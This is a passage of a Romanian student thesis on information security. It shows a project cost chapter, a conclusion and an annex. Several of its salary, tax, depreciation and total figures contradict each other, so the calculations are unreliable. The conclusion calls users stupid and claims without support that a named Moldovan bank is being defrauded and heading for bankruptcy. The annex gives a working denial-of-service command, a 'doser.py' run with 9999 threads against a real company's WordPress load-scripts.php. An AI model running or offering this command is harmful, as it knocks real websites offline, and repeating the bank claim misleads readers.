De luat în considerare faptul că proiectantul este un specialist în domeniu căruia i se achită un
salariu , fie că e vorba de un programator sau matematician . La calculul salariului pentru persoanele
implicate în proiect este dedus din planul calendaristic calculat anterior, unde este arătat timpul efectiv
de lucru.
Salariul se va calcula după forma de salarizare în regie care constă în calculul și plata salariului
în raport cu timpul efectiv lucrat.
Pentru realizarea proiectului pot fi utilizate resurse umane atrase din exterior, sala riați din
bugetul proiectului cum ar fi lucrători. Tot volumul de lucru trebuie repartizat între lucrătorii salariați,
conform atribuțiilor din fișa postului care stau la baza calculării salariului.
Tabelul 5 – Consumuri directe privind retribuirea muncii
Nr.
d/o Funcția Angajatului Volumul de
lucru, zile Salariul
contractual
pe unitate de
timp, lei FSB, lei Prime și
adaosuri,
% FRM, lei
1 Specialist IT 60 627,5 37650 20 45181
2 Matematician 63 450,0 28350 20 34020
3 Total 123 1077.5 66000 79201
Baza căruia se calculează contribuția de asigurări sociale de stat obligatorii și prima de asigurare
obligatorie de asistență medicală.
Contribuția la fondul de asigurări sociale se calculează după formula (3):
FAS = FRM × Cfs(%)
unde:
FAS – contribuția la fondul de asigurări sociale;
Cfs – cota contribuțiilor de asigurări sociale de stat obligatorii care se aprobă în fiecare an prin Legea
bugetului asigurărilor sociale de stat.
Conform Legii bugetului asigurărilor sociale de stat pe anul 201 9, contribuția la bugetul
asigurărilor sociale de stat obligatorii, suportată de angajator, constituie 18% din fondul de remunerare
a muncii. Fondurile asigurării obligatorii de asistență medicală se calculează după formula (4):
FAM = FRM × Cam(%)
unde:

68
FAM – fondurile asigurării obligatorii de asistență medicală;
Cam – cota primei de asigurare obligatorie de asistență medicală care se aprobă în fiecare an prin Legea
Republicii Moldova privind fondurile asigurării obligatorii de asisten ță medicală.
Consumurile indirecte reprezintă consumurile volumul cărora nu depinde sau depinde neesențial
de volumul de producție cum ar fi: consumul de energie electrică folosită pentru iluminare, consumul
efectuat pentru încălzirea spațiului, consumuri privind deplasarea , chiria etc.
După efectuarea calculelоr in tabelul 5 suma tоtal ă a Specialistului IT per pro iect este de 37650 lei.
Efect uand tоate calculele, urmează să calulă m fоndul sоcial, taxa asigurari sоcile de stat care este de
18%(cfs), asigurarea medicala care este de 4.5%(cam) si fоndul de pensiоnare care este de 6%(cfp)

Fоndul Sоcial
FAS= FRM x Cfs(%) = 79201 x 18% = 14256 lei
Asigurarea medicală оbligatоrie
FAM= FRM x Cam(%) = 79201 x 4.5% = 3564 lei
FP = FRM x 6% = 79201 x 6% = 4752 lei
Pentru calcularea impоzitului pe venit al unui prоgramatоr pe о periоada de 12 luni și cоtele prоcentuale
se va ține cont cоnfоrm legislației în vigоare:
– cоta de impоzitare – 12%
– fоndul de pensiоnare – 6% din venit;
– fоndul de asigurare medială – 4.5% din venit;
– scutirea persоnală pentru fiecare persоna în valоare de 24000 lei .
Salariul brut a programatorului pe о periоadă de 12 luni cоnfоrm legislației în vigоare pentru anul 2019
este de 75300 lei.
Pentru calculul venitului impоzitabil sunt utilizate următоarele nоțiuni:
VI – venit impоzitabil;
VB – venit brut;
FP – fоndul de pensiоnare;
FAM – fоndul de asigurare medicală;
SP – scutirea persоnală;
IV- impоzitul pe venit;
I – cоta de impоzitare.
Fоndul de pensii = VB x 6% = 37650 x 6% = 2259 lei
Fоndul de asigurare medicală оbligatоrie = VB x 4.5% = 1694,25 lei.
Venitul Impоzitabil = VB – FP – FAM – SP= 37650 – 4752 – 3564 – 24000= 5334 lei.
Impоzitul pe venit = VI – I = 5334 x 12% = 640 lei.

69
Venitul net: VB – IV – FP – FAM = 37650 – 640 – 4752 – 3564 = 28694 lei.
Datele prezentate sunt catalogate consumurile indirecte ce nu afectează volumul de producție.
Consumurile indirecte reprezintă consumurile volumul cărora nu depinde sau depinde neesențial
de volumul de producție cum ar fi: consumul de energie electrică folosită pentru iluminare, consumul
efectuat pentru încălzirea spațiului, consumuri privind deplasarea , chiria etc.
Costul de producție reprezintă totalitatea cheltuielilor corespunzătoare consumului de factori de
producție, pe care agenț ii economici le efectuează pentru producerea și vînzarea de bunuri materiale sau
prestarea de servicii .
Datele prezentate conform Tabelului 6 sunt catalogate consumurile indirecte ce nu afectează
volumul de producție.
Tabelul 6 – Consumuri indirecte
Un.
Tarif/un, Valoarea
Denumirea articolului de Cantitatea
lei totala, lei

măs.

Arenda încăperii 𝑚2 20 400 8000
Încălzirea G/Kal 2 1500 3000
Energia electrică Kw/h 30 2 60
Servicii de simulare la distanță Lunar 1 200 200
Servicii Internet Lunar 3 250 250
Servicii de Cloud GB 50 5 250
Deplasări la instituții externe de
cercetare Km 100 7 700
Total 2364 12460
Norma uzurii se calculează în funcție de durata utilizării activului. Durata utilizării activului se
determină după categoria lui: AMTL
– 3-5 ani, ANTL – 2-3 ani.
Formula de calcul a fondului de amortizare este (5):
𝐹𝐴=𝑀𝐹𝑖
𝐷𝐹𝑈 × 𝑇𝑖 (5)

70
Unde:
FA – fondul amortizării, lei;
MFi – valoarea de intrare;
Ti – durata proiectului;
DFU – durata de funcționare utilă.
La calculul uzurii mijloacelor fixe au fost utilizate mijloacele materiale :
Calculator = 20000:36 x 4 = 2222 lei;
RAM = 6500:24 x 5=3576 lei;
Pentru a reprezenta uzura totală este necesar să sumăm totalitatea uzurilor activelor materiale.
Utotal = 1 666 +541,6 = 2207,6 lei;
Pentru a reprezenta fondul de amortizare totală sumăm totalitatea fondurilor pentru fiecare
imobilizare corporală: FondAmortizare (total) = (20000:36)x4 +(6500:24)x4=3305,5 lei.
Cheltuielile pentru dispozitivul fizic nu au fost incluse în aceste calcule deoarece în principal
reprezintă o statistică de perspectivă ce include multe oportunități în dezvoltarea cercetării. Cheltu ielile
pot crește substanțial dacă proiectul este dezvoltat pe viitor înspre ramura fizică paralel cu cea
tehnologică. În Tabelul 7 este reprezentat costul de elaborare.
Tabelul 7 – Costul de elaborare
Articole de calculație Valoarea, Ponderea,

lei %

Consumuri directe de materiale 1440 1,42

Consumuri directe privind retribuirea

Muncii 66000 65,27

Contribuții de asigurări sociale de stat

obligatorii (FAS) 14256 14,09

Prima de asigurare obligatorie de asistență 3,53

medicală (FAM) 3564

Consumuri indirecte 12460 12,33

Cheltuieli generale și administrative 3400 3,36

TOTAL 101120 100

Avînd la dispoziție prețul de cost al unei copii de produs, se poate determina prețul de realizare
pe piață a produsului
Metoda „bottom -up”

71
Prețul brut este alcătuit din prețul de cost ce este necesar pentru a produce o unitate de produs și profitul
care tindem să -l obținem:
Preț brut = Preț de cost + Profit = 101120 + 9520= 110640 lei ;
Profitul net, PN este alcătuit din diferența dintre Prețul Brut și Impozitul pe venit. Iar
rentabilitatea este raportul dintre prețul net către costul total de realizare pentru o unitate de produs
înmulțit la 100%
PN = P . brut – Imp.venit = 110640 – 640 = 110000 lei;
Prețul de realizare Prz este raportul dintre Prețul Brut calculat anterior și TVA de 20% conform
legislației în vigoare.
Prz = Preț brut + TVA = 110640 + 20%TVA= 132768 lei .

72
Сoncluzie

Ca umare din cele spuse de mine în acestă lucrare și în urma efectuarii acestei lucrări este
posibil de înțeles că nu există sistemă asigurată la maxim din punc de vedere a securității, orice sistemă
este vunerabilă, chiar dacă este considerat ca acea sis temă nu este vulnereabilă, acest lucru înseamnă ca
la momentul actual încă nu să gasit vulnerabilitate pentru aceste sisteme, de aici putem întelege că
datele pe care le creem în mediul online nu sunt protejate deloc, da aceste date nu sunt vizibile pe ntru
simpli utilizatori care sunt proști ca un copac și pot fi usor mințiți,însă datele noaste nu sunt protejate și
nu există protecție pentru ele. La moment cele mai vulnerabile sunt sistemele bancare care care nu au
sisteme de protecție contra fraudelor bănești de pe conturile personale a utilizatorilor serviciilor prestate
de banca care deține conturile cu banii grupului social asa numit “muncitorii” dacă utilizatorului i -au
fost compomițate devicele sau unul din ele atunci datele automat sunt expulzate de pe acest device cu
ajutorul unui stealer, după se crează acounturi fake cu aceleași nume prenume il altă bancă sau chiar în
aceiași bancă dupa pe contul creat se trimit banii sau alte bunuri financiare care sunt posibile de
transmis, paypal,localbitcoi ns,ETH,BTC s.a.m.d. Deja astefel de lucruri sau petrecut cu moldova
agroinbank(maib.md) ca urmare acestă bancă iși perde clienții si peste o perioadă ar trebui să
falimenteze. Deja aici sunt o mulțime de scheme din domeniul carding cum de folosit aceste da te în
scopuri malefice. Totodată este de înteles ca există o mulțime de metode de a obține sau a compromița
date începînd cu ceva simplu de genul fishing,sniffing pîna la crearea backdoor în diferite sisteme reale
care lucrează în timp real
La moment crea mai securizată sistemă este blockhain din motiv :
Este o multitudine de copii care la rîndul lor sunt si originale , Pentru a face ceva modificări este necesar
de sters toate celelalte 7 milione de copii , Pentru a modifica ceva trebuie ca toate copiile sa se
sincronizeze în același timp , Permite achitarile online a oricări serviciu inclusiv și serviciile comunale ,
Metoda unicală de criptare a datelor , Independentă fată de sistemele bancare și cele materiale ,Liberul
schimb de informție , Oferă posibilitate de lucru , Oferă posibilitatede creare de startupuri pe baza acestei
tehnologii , Oferă posibilitatea de a obține resurse financiare prin mining . O altă concluzie putem trage
din metologiile psihologice și putem întelege ca dacă celelalte tipuri de atacuri po t fi în o oarecare
măsura stopate, păi există o metologie cu numele Black SEO care nu poate fi oprită și care poate duce la
pagube enorme pentru orice companie pînă la faliment din motivul creeri unei masiv de neîncredere din
partea consumatorilor finali, astfel aici cam toți sunt în pierdere începînd cu statul pîna la singuri
consumatorii finali ne mai vorbind de producător. Astfel în ziua de azi lucrează marchetingul

73

74
Anexa
1) python doser.py –g 'https://www.asaptickets.com/wp -admin/load –
scripts.php?c=1&load%5B%5D=eutil,common,wp –
a11y,sack,quicktag,colorpicker,editor,wp -fullscreen -stu,wp -ajax-response,wp -api-
request,wp -pointer,autosave,heartbeat,wp -auth-check,wp -lists,prototype,scriptaculous –
root, scriptaculous -builder,scriptaculous -dragdrop,scriptaculous -effects,scriptaculous –
slider,scriptaculous -sound,scriptaculous -controls,scriptaculous,cropper,jquery,jquery –
core,jquery -migrate,jquery -ui-core,jquery -effects -core,jquery -effects -blind,jquery -effect s-
bounce,jquery -effects -clip,jquery -effects -drop,jquery -effects -explode,jquery -effects –
fade,jquery -effects -fold,jquery -effects -highlight,jquery -effects -puff,jquery -effects –
pulsate,jquery -effects -scale,jquery -effects -shake,jquery -effects -size,jquery -effects –
slide,jquery -effects -transfer,jquery -ui-accordion,jquery -ui-autocomplete,jquery -ui-
button,jquery -ui-datepicker,jquery -ui-dialog,jquery -ui-draggable,jquery -ui-droppable,jquery –
ui-menu,jquery -ui-mouse,jquery -ui-position,jquery -ui-progressbar,jquery -ui-
resiz able,jquery -ui-selectable,jquery -ui-selectmenu,jquery -ui-slider,jquery -ui-
sortable,jquery -ui-spinner,jquery -ui-tabs,jquery -ui-tooltip,jquery -ui-widget,jquery –
form,jquery -color,schedule,jquery -query,jquery -serialize -object,jquery -hotkeys,jquery -table –
hotkey s,jquery -touch -punch,suggest,imagesloaded,masonry,jquery –
masonry,thickbox,jcrop,swfobject,moxiejs,plupload,plupload -handlers,wp –
plupload,swfupload,swfupload -all,swfupload -handlers,comment –
repl,json2,underscore,backbone,wp -util,wp -sanitize,wp –
backbone,revis ions,imgareaselect,mediaelement,mediaelement -core,mediaelement –
migrat,mediaelement -vimeo,wp -mediaelement,wp –
codemirror,csslint,jshint,esprima,jsonlint,htmlhint,htmlhint -kses,code -editor,wp -theme –
plugin -editor,wp -playlist,zxcvbn -async,password -strength -mete r,user -profile,language –
chooser,user -suggest,admin -ba,wplink,wpdialogs,word -coun,media –
upload,hoverIntent,customize -base,customize -loader,customize -preview,customize –
models,customize -views,customize -controls,customize -selective -refresh,customize –
widgets,cu stomize -preview -widgets,customize -nav-menus,customize -preview -nav-
menus,wp -custom -header,accordion,shortcode,media -models,wp -embe,media -views,media –
editor,media -audiovideo,mce -view,wp -api,admin -tags,admin -comments,xfn,postbox,tags –
box,tags -suggest,post,edi tor-expand,link,comment,admin -gallery,admin -widgets,media –
widgets,media -audio -widget,media -image -widget,media -gallery -widget,media -video –
widget,text -widgets,custom -html-widgets,theme,inline -edit-post,inline -edit-tax,plugin –
install,updates,farbtastic,iris,w p-color -picker,dashboard,list -revision,media –
grid,media,image -edit,set -post-thumbnail,nav -menu,custom -header,custom –
background,media -gallery,svg -painter&ver=4.9' -t 9999.

75

Similar Posts